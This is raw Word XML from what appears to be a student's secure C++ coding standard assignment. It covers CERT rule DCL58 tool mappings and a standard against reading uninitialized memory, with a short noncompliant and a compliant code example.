              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_CPP-DCL58-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08A327DD" w14:textId="45EECD09" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Do not modify the standard namespaces 'std' and '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>posix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015616F" w14:paraId="50569B33" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D888D34" w14:textId="341C3A6A" w:rsidR="0015616F" w:rsidRDefault="00000000" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId117" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A9DC142" w14:textId="3C6BA0AA" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310BD1C0" w14:textId="6CBAD4FF" w:rsidR="0015616F" w:rsidRDefault="00000000" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId118" w:history="1">
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C++: DCL58-CPP</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D7A853F" w14:textId="0B994E8D" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Checks for modification of standard namespaces (rule fully covered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B7A66" w14:paraId="6F86E3DA" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258CE126" w14:textId="0E853B78" w:rsidR="006B7A66" w:rsidRDefault="00000000" w:rsidP="006B7A66">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId119" w:history="1">
              <w:r w:rsidR="006B7A66">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>PVS-Studio</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28A63EAE" w14:textId="4C1458CF" w:rsidR="006B7A66" w:rsidRDefault="006B7A66" w:rsidP="006B7A66">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CBF64D1" w14:textId="64B63B90" w:rsidR="006B7A66" w:rsidRDefault="00000000" w:rsidP="006B7A66">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId120" w:history="1">
              <w:r w:rsidR="006B7A66">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V1061</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258B63F8" w14:textId="284B5FCA" w:rsidR="006B7A66" w:rsidRDefault="006B7A66" w:rsidP="006B7A66">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B7A66" w14:paraId="669BE97C" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E01C55" w14:textId="45566FF8" w:rsidR="006B7A66" w:rsidRDefault="00000000" w:rsidP="006B7A66">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId121" w:history="1">
              <w:r w:rsidR="006B7A66">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>SonarQube C/C++ Plugin</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44AB9F5A" w14:textId="79D1C9AD" w:rsidR="006B7A66" w:rsidRDefault="006B7A66" w:rsidP="006B7A66">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="070D1B90" w14:textId="3B466806" w:rsidR="006B7A66" w:rsidRDefault="00000000" w:rsidP="006B7A66">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId122" w:anchor="RSPEC-3470" w:history="1">
              <w:r w:rsidR="006B7A66">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>S3470</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CE70AF4" w14:textId="6DCA93D9" w:rsidR="006B7A66" w:rsidRDefault="006B7A66" w:rsidP="006B7A66">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6" w:name="_Toc52464067"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 9</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A24434F" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1"/>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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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FB3E279" w:rsidR="00B475A1" w:rsidRPr="00EF0D94" w:rsidRDefault="00D4403F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="519E82BC" w14:textId="528BFF57" w:rsidR="00B475A1" w:rsidRDefault="00EF0D94" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>EXP</w:t>
            </w:r>
            <w:r w:rsidR="00B475A1">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>053</w:t>
            </w:r>
            <w:r w:rsidR="00B475A1">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="490A5770" w14:textId="0EF7F1FE" w:rsidR="00B475A1" w:rsidRDefault="00142BDD" w:rsidP="00F51FA8">
            <w:r w:rsidRPr="00142BDD">
              <w:t>Do not read uninitialized memory</w:t>
            </w:r>
            <w:r w:rsidR="006627E0">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="008C6C37" w:rsidRPr="008C6C37">
              <w:t>Local, automatic variables assume unexpected values if they are read before they are initialized.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40E2635A" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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1E15CFA" w:rsidR="00F72634" w:rsidRDefault="00ED7C3F" w:rsidP="00A72503">
            <w:r w:rsidRPr="00ED7C3F">
              <w:t>In this noncompliant code example, an uninitialized local variable is evaluated as part of an expression to print its value, resulting in undefined behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="25A0CD90" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4993E525" w14:textId="77777777" w:rsidR="00C773F3" w:rsidRDefault="00C773F3" w:rsidP="00C773F3">
            <w:r>
              <w:t>#include &lt;iostream&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49CA9A54" w14:textId="77777777" w:rsidR="00C773F3" w:rsidRDefault="00C773F3" w:rsidP="00C773F3">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C8F52D7" w14:textId="77777777" w:rsidR="00C773F3" w:rsidRDefault="00C773F3" w:rsidP="00C773F3">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216A0981" w14:textId="77777777" w:rsidR="00C773F3" w:rsidRDefault="00C773F3" w:rsidP="00C773F3">
            <w:r>
              <w:t xml:space="preserve">  int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7BFB5607" w14:textId="77777777" w:rsidR="00C773F3" w:rsidRDefault="00C773F3" w:rsidP="00C773F3">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>cout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &lt;&lt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E1D505C" w14:textId="74204546" w:rsidR="00F72634" w:rsidRDefault="00C773F3" w:rsidP="00C773F3">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24FAD59F"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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BB54E1C" w:rsidR="00F72634" w:rsidRDefault="00C773F3" w:rsidP="00A72503">
            <w:r w:rsidRPr="00C773F3">
              <w:t>In this compliant solution, the object is initialized prior to printing its value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="4E6EA6E9" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04B5A2CF" w14:textId="77777777" w:rsidR="00AD114A" w:rsidRDefault="00AD114A" w:rsidP="00AD114A">
            <w:r>
              <w:t>#include &lt;iostream&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4733A2EF" w14:textId="77777777" w:rsidR="00AD114A" w:rsidRDefault="00AD114A" w:rsidP="00AD114A">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22FE8C75" w14:textId="77777777" w:rsidR="00AD114A" w:rsidRDefault="00AD114A" w:rsidP="00AD114A">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A5F31FB" w14:textId="77777777" w:rsidR="00AD114A" w:rsidRDefault="00AD114A" w:rsidP="00AD114A">
            <w:r>
              <w:t xml:space="preserve">  int </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="510D3CFB" w14:textId="77777777" w:rsidR="00AD114A" w:rsidRDefault="00AD114A" w:rsidP="00AD114A">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>cout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &lt;&lt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="316D7001" w14:textId="03E93803" w:rsidR="00F72634" w:rsidRDefault="00AD114A" w:rsidP="00AD114A">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06061C9A" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3383FF43" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Int_8afkpeKf"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>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A202186" w14:textId="3E848969" w:rsidR="00515501" w:rsidRPr="00653D3B" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s</w:t>
            </w:r>
            <w:r w:rsidRPr="00653D3B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
            <w:r w:rsidR="007E34BE" w:rsidRPr="00653D3B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00515501" w:rsidRPr="00653D3B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00653D3B" w:rsidRPr="00653D3B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00515501" w:rsidRPr="00653D3B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00653D3B" w:rsidRPr="00653D3B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Heed Compiler Warnings:</w:t>
            </w:r>
            <w:r w:rsidR="00653D3B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009F4672">
              <w:t>Compilers often warn about the use of uninitialized variables. Heeding these warnings helps developers avoid the pitfalls of using uninitialized memory.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E47378" w14:textId="3C9E25E2" w:rsidR="00B475A1" w:rsidRDefault="007E34BE" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidR="00B475A1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D0449C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Use Effective Quality Assurance Techniques</w:t>
            </w:r>
            <w:r w:rsidR="00D0449C">
              <w:t>: This principle emphasizes the importance of rigorous testing and code review processes. By implementing effective QA techniques, such as static analysis tools and thorough testing procedures, developers can identify and mitigate issues related to uninitialized memory access early in the development lifecycle.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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43F4F9FA" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2826D386" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="748D7E23" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="732D0956" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="43192141" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D640FC1" w14:textId="42506478" w:rsidR="00B475A1" w:rsidRDefault="00167221" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72BD1BCD" w14:textId="139EA11A" w:rsidR="00B475A1" w:rsidRDefault="00167221" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE08C9E" w14:textId="7EDE2DA3" w:rsidR="00B475A1" w:rsidRDefault="00167221" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="507F810F" w14:textId="54AC28F2" w:rsidR="00B475A1" w:rsidRDefault="00167221" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4686F95C" w14:textId="76116148" w:rsidR="00B475A1" w:rsidRDefault="00167221"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
